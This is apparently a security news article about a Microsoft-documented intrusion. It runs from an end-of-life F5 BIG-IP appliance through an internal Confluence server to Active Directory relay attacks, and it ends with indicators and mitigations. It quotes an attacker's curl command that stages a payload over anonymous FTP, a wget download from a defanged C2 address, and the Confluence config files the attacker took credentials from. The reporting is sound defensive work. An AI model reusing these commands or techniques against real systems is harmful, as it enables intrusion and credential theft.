Threat actors are actively exploiting end-of-life F5 BIG-IP appliances to gain unauthorized SSH access into enterprise networks, using the compromised devices as launchpads for sophisticated multi-stage intrusion campaigns that ultimately target Active Directory infrastructure.
Microsoft Threat Intelligence disclosed the full attack chain on May 22, 2026, documenting how a single compromised edge appliance cascaded into domain-level compromise spanning Linux hosts, an internal Atlassian Confluence server, and Windows authentication systems.
In the documented incident, investigators traced the threat actor’s initial SSH access to an Azure-hosted F5 BIG-IP Virtual Edition (VE) running version 15.1.201000, a cloud-deployed build commonly provisioned via Azure ARM templates and Terraform modules.
This specific version reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of compromise.
F5 BIG-IP to Gain SSH Access
The timing aligns directly with the broader F5 threat landscape. In August 2025, a sophisticated nation-state threat actor breached F5’s internal systems and exfiltrated BIG-IP product source code along with details of undisclosed, unpatched vulnerabilities.
That breach, publicly disclosed by F5 in October 2025, has been linked to the BRICKSTORM malware family, which is associated with campaigns targeting software and cloud vendors to harvest source code and credentials for downstream supply chain exploitation.
Compounding the risk, CVE-2025-53521, a critical flaw in F5 BIG-IP Access Policy Manager (APM), was originally disclosed in October 2025 as a denial-of-service bug. Still, it was reclassified in March 2026 as a remote code execution (RCE) vulnerability with a CVSS score of 9.8.
CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with Shadowserver Foundation reporting over 17,000 vulnerable IPs worldwide at the time. The Dutch National Cyber Security Center also independently confirmed active abuse of this vulnerability in the wild.
Once SSH access was established via the compromised F5 appliance, the threat actor authenticated using a privileged account with unrestricted sudo rights and maintained hands-on keyboard access throughout the entire intrusion without deploying explicit persistence mechanisms.
The attacker immediately launched aggressive reconnaissance using a layered toolkit:
- Nmap with automated shell scripts for horizontal and vertical network scanning across internal subnets
- GoWitness to screenshot-capture all discovered HTTP/HTTPS services
- testssl to probe SSL/TLS weaknesses and identify potential protocol downgrade paths
- A custom ELF binary detected as HackTool:Linux/MalPack.B downloaded from
206.189.27[.]39:8888viawgetto enumerate web application access controls
Attempts to use standard NTLM-based lateral movement tools, including enum4linux, kerbrute, responder, smbclient, and netexec against the Windows infrastructure were initially unsuccessful.
During reconnaissance, the threat actor identified an internally hosted Atlassian Confluence server carrying unpatched remote code execution vulnerabilities.
Microsoft stated that the server was not internet-facing; it became reachable only after the attacker gained internal network access, a key risk in hybrid and cloud environments where implicit trust boundaries exist between services.
When real-time protection (RTP) on the Confluence host blocked direct payload delivery, the threat actor adapted by standing up a Python FTP server on the initial Linux host to stage and transfer the payload using anonymous FTP:
bashcurl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5After compromising Confluence, the attacker extracted credentials from /opt/atlassian/confluence/conf/server.xml and confluence.cfg.xml and weaponized them for Kerberos relay attacks against the domain infrastructure.
This included exploitation of CVE-2025-33073, a Windows SMB NTLM reflection vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv.
CVE-2025-33073 removes the prerequisite of admin access to achieve authenticated RCE as SYSTEM on any domain-joined machine without SMB signing enforced, requiring only network access and any valid domain credential.
| Indicator | Type | Description |
|---|---|---|
4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 | SHA-256 File Hash | Custom scanning tool (HackTool:Linux/MalPack.B) |
b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 | SHA-256 File Hash | Shell script automating Nmap network scanning |
710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | SHA-256 File Hash | Kerbrute tool (HackTool:Linux/Kerbrute!rfn) |
57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 | SHA-256 File Hash | gowitness HTTP/HTTPS screenshot scanner |
bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 | SHA-256 File Hash | NTLM relay Python script (CVE-2025-33073 exploit) |
206.189.27[.]39 | IPv4 Address (Defanged) | C2 server payload delivery on port 8888 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Mitigation
- Retire EOL appliances immediately treat internet-facing edge devices as Tier-0 assets with strict lifecycle governance
- Patch internal applications like Confluence with the same urgency as internet-exposed services.
- Disable or minimize NTLM, enforce SMB signing, and enable LDAP signing and channel binding to block relay attacks
- Enable Microsoft Defender for Endpoint in block mode consistently across all Linux servers.
- Implement a tiered administration model to prevent single-application credential theft from reaching domain controllers
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
